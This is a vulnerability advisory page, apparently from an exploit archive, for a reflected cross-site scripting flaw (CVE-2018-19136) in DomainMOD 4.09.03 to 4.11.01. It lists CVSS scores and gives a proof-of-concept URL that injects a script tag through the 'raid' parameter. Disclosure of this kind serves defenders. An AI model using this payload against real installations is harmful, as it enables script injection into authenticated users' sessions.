DomainMOD 4.11.01 Cross Site Scripting

2018.11.16

Credit: Dawood Ansar

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2018-19136

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-09
# Exploit Author: Dawood Ansar
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19136
 
# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application 
# versions from v4.09.03 to v4.11.01i1/4https://github.com/domainmod/domainmod/issues/79i1/4
# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php 
# page and inject a javascript XSS payload in raid parameter
 
# POC: 
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

DomainMOD 4.11.01 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

DomainMOD 4.11.01 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.